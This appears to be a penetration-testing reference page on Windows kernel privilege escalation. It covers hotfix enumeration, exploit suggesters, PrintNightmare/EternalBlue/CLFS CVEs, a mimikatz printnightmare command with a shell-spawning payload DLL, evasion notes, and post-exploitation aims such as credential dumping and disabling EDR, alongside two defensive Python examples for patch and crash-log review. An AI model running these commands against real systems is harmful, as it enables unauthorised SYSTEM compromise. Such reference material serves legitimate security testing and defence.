Kernel Exploits (Windows)

# Overview

Windows kernel exploits target vulnerabilities in the Windows kernel or drivers to escalate from user to SYSTEM. Like Linux kernel exploits, these are high-risk, high-reward: they bypass all userland security controls but can cause Blue Screen of Death (BSoD), system instability, or data corruption. Always check the patch level against known CVEs before attempting.

# Prerequisites

  • User-level shell access
  • Knowledge of installed patches (wmic qfe, systeminfo)
  • Exploit suggester tools (WES-NG, Watson)
  • Compilation environment: Visual Studio or MinGW

# Detection & Enumeration

```cmd
rem List installed hotfixes
wmic qfe get HotFixID
wmic qfe get HotFixID | findstr /i "KB"

rem Full system info (includes hotfix list)
systeminfo
systeminfo | findstr /i "hotfix"

rem Get OS build number
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
```

```powershell
# PowerShell hotfix enumeration
Get-HotFix | Format-Table HotFixID,InstalledOn
Get-HotFix | Where-Object {$_.HotFixID -like "*KB500*"}  # Check specific patch

# Check for specific security update
Get-HotFix -Id KB4540673 -ErrorAction SilentlyContinue
```

# Automated Exploit Suggestion

```bash
# WES-NG (Windows Exploit Suggester Next Gen) - on attacker machine
# First, collect systeminfo from target:
systeminfo > systeminfo.txt

# Then run WES-NG:
python3 wes.py systeminfo.txt
python3 wes.py systeminfo.txt --impact "Elevation of Privilege"

# Alternative: Watson (on-target .NET tool)
.\Watson.exe
# Watson enumerates missing patches and suggests exploits

# Sherlock.ps1 (PowerShell, on-target)
. .\Sherlock.ps1
Find-AllVulns
```

# Exploitation / Execution

## Compilation Strategy

```cmd
rem Option 1: Compile on attacker machine with MinGW
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
x86_64-w64-mingw32-gcc exploit.c -o exploit64.exe -lws2_32

rem Option 2: Pre-compiled exploits from repositories
rem Download the appropriate .exe for the target architecture

rem Option 3: Visual Studio project on a Windows VM
rem Build Release x64, transfer to target
```

## Common Windows Kernel Exploits

PrintNightmare (CVE-2021-34527 / CVE-2021-1675):

```powershell
# Print Spooler RCE -- most common on unpatched Server 2016/2019
# Check if vulnerable:
Get-Service Spooler | Format-Table Name,Status

# Exploit with Mimikatz or standalone PoC:
.\mimikatz.exe "misc::printnightmare /server:dc01 /library:C:\temp\payload.dll"
# payload.dll is a DLL that creates a local admin user or spawns a reverse shell
```

EternalBlue (CVE-2017-0144 / MS17-010):

```bash
# SMBv1 exploit -- affects unpatched Windows 7/2008 R2/2012 R2
# Primarily used for remote exploitation, but can be used post-exploit
# Check if patch is applied:
wmic qfe | findstr KB4012212
```

CLFS Driver (CVE-2022-37969 / CVE-2023-28252):

```cmd
rem Common Log File System driver exploits
rem Affects Windows 10/11 and Server 2019/2022
rem Check patch: KB5012170 or later

rem PoC typically spawns SYSTEM shell via CLFS manipulation
.\CVE-2023-28252.exe
```

Named Pipe File System (CVE-2022-21881 / CVE-2022-21999):

```cmd
rem NPFS vulnerability -- spawns SYSTEM shell
rem Windows 10/11, Server 2019/2022 before Jan 2022
```

Windows Print Spooler Elevation (CVE-2022-22718):

```cmd
rem Another spooler vulnerability, different from PrintNightmare
rem Affects multiple Windows versions
```

## Exploit Verification

```cmd
rem Before running, verify exploit architecture matches OS
systeminfo | findstr "System Type"
rem x64-based PC: use 64-bit exploit
rem x86-based PC: use 32-bit exploit

rem Check if MS17-010 (EternalBlue) patch is applied:
wmic qfe | findstr KB4012212
wmic qfe | findstr KB4012215
rem If neither is listed, system is vulnerable
```
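The patch-level check that the Detection & Enumeration and Exploit Verification sections do by hand with `findstr` can be scripted so an auditor compares the installed KB set (not just the build number, which backported fixes leave unchanged) against the KBs that close an advisory. This is an added example, not a tool from the page; the `systeminfo` text is constructed, the MS17-010 to KB4012212/KB4012215 mapping is the one this page gives, and the `REQUIRED_PATCHES` shape is an assumption to be filled from vendor advisories.

```python
import re

# Constructed sample of `systeminfo` output (not captured from a real host), with the
# hotfix list a reviewer would compare against the KBs named on this page.
SYSTEMINFO_SAMPLE = """\
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2999226
                           [02]: KB3020369
                           [03]: KB4012215
"""

# Advisory -> KBs that close it. MS17-010 -> KB4012212/KB4012215 comes from this page;
# the dict itself is an assumed shape for the example, extend it from vendor advisories.
REQUIRED_PATCHES = {
    "MS17-010 (CVE-2017-0144)": {"KB4012212", "KB4012215"},
}

def parse_systeminfo(text):
    """Pull the OS fields and the installed KB set out of systeminfo text."""
    info = {"Hotfixes": set()}
    for line in text.splitlines():
        m = re.match(r"\s*\[\d+\]:\s*(KB\d+)", line, re.IGNORECASE)
        if m:
            info["Hotfixes"].add(m.group(1).upper())
            continue
        m = re.match(r"(OS Name|OS Version|System Type):\s*(.+)", line)
        if m:
            info[m.group(1)] = m.group(2).strip()
    return info

def host_arch(info):
    """'x64' or 'x86' from the System Type line, so the right patch class is reviewed."""
    return "x64" if info.get("System Type", "").lower().startswith("x64") else "x86"

def build_number(info):
    """Build number from OS Version; backported fixes do not change it, so do not rely on it alone."""
    m = re.search(r"Build (\d+)", info.get("OS Version", ""))
    return int(m.group(1)) if m else None

def missing_patches(info, required=REQUIRED_PATCHES):
    """Advisories for which none of the closing KBs is installed (KB match, not build match)."""
    return sorted(adv for adv, kbs in required.items() if not kbs & info["Hotfixes"])
```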

# Common Pitfalls

  • Wrong architecture (x86 exploit on x64 OS) -- exploit crashes or fails silently
  • Exploit crashes the system (BSoD) -- always have a backup shell or be prepared to lose access
  • Patches may be applied without changing the OS build number (backported fixes)
  • Exploit binaries from unknown sources may contain backdoors or malware
  • Windows Defender may quarantine the exploit binary before execution
  • CLFS exploits may corrupt filesystem metadata -- can cause persistent issues even after reboot
  • Some exploits require specific compiler flags or runtime libraries (VC++ redistributable)

# OPSEC Considerations

  • Kernel exploits are the noisiest escalation method and almost always trigger AV/EDR.
  • BSoD generates crash dumps, event log entries (event ID 41, 1001), and potential SIEM alerts.
  • Successfully exploited kernel vulnerabilities may be flagged by Microsoft Defender ATP behavioral detection.
  • The wmic qfe command is low noise -- patch enumeration is standard admin behavior.
  • Exploiting patchable kernel bugs on production systems may violate rules of engagement -- confirm scope.
  • Post-exploitation kernel drivers (rootkits) are extremely persistent and difficult to remove -- high forensic impact.
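The crash evidence mentioned above (event ID 41 from Kernel-Power followed by a BugCheck 1001 entry) is what a SOC would correlate to separate a kernel-exploit BSoD from an ordinary power loss. This is an added detection example, not from the page; the event rows are constructed in the shape of a `Get-WinEvent | Export-Csv` export (time, source, ID, message), and the five-minute pairing window is an assumption.

```python
import re
from datetime import datetime, timedelta

# Constructed event-log rows (time, source, event ID, message); illustrative, not from a real host.
EVENT_ROWS = [
    ("2024-03-01T09:14:02", "Microsoft-Windows-Kernel-Power", 41,
     "The system has rebooted without cleanly shutting down first."),
    ("2024-03-01T09:14:05", "BugCheck", 1001,
     "The computer has rebooted from a bugcheck.  The bugcheck was: 0x0000003b "
     "(0x00000000c0000005, 0xfffff80002a1b2c0, 0xfffff88004a0b8a0, 0x0000000000000000). "
     "A dump was saved in: C:\\Windows\\MEMORY.DMP."),
    ("2024-03-03T18:00:10", "Microsoft-Windows-Kernel-Power", 41,
     "The system has rebooted without cleanly shutting down first."),  # power loss, no bugcheck
]

BUGCHECK_RE = re.compile(r"bugcheck was: (0x[0-9a-fA-F]+)")
CORRELATION_WINDOW = timedelta(minutes=5)  # assumed pairing window

def find_crash_reboots(rows, window=CORRELATION_WINDOW):
    """Pair each Kernel-Power 41 with a BugCheck 1001 logged within `window` after it.

    Returns one dict per 41 event with the bugcheck code when a 1001 matched, or None
    when the unclean shutdown had no bugcheck (e.g. power loss rather than a BSoD).
    """
    events = [(datetime.fromisoformat(t), src, eid, msg) for t, src, eid, msg in rows]
    bugchecks = [(t, msg) for t, _, eid, msg in events if eid == 1001]
    findings = []
    for t, _, eid, _ in events:
        if eid != 41:
            continue
        code = None
        for bt, msg in bugchecks:
            if timedelta(0) <= bt - t <= window:
                m = BUGCHECK_RE.search(msg)
                code = m.group(1) if m else "unknown"
                break
        findings.append({"time": t.isoformat(), "bugcheck": code})
    return findings
```

Only the 41 events that have a 1001 partner carry a bugcheck code; the dump path in the 1001 message tells the responder where to collect the memory image for triage.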

# Post-Exploitation Value

Successful kernel exploitation provides SYSTEM access. From SYSTEM: dump all credentials, install persistent backdoors, modify kernel-level security policies, disable EDR/AV at the kernel level, and move laterally with full machine account privileges.

# Tool References

| Tool | Link |
|------|------|
| WES-NG | https://github.com/bitsadmin/wesng |
| Watson | https://github.com/rasta-mouse/Watson |
| Sherlock | https://github.com/rasta-mouse/Sherlock |
| Exploit-DB | https://www.exploit-db.com/ |

# Source Machines

  • Generic Windows - CVE matching via WES-NG and Watson enumeration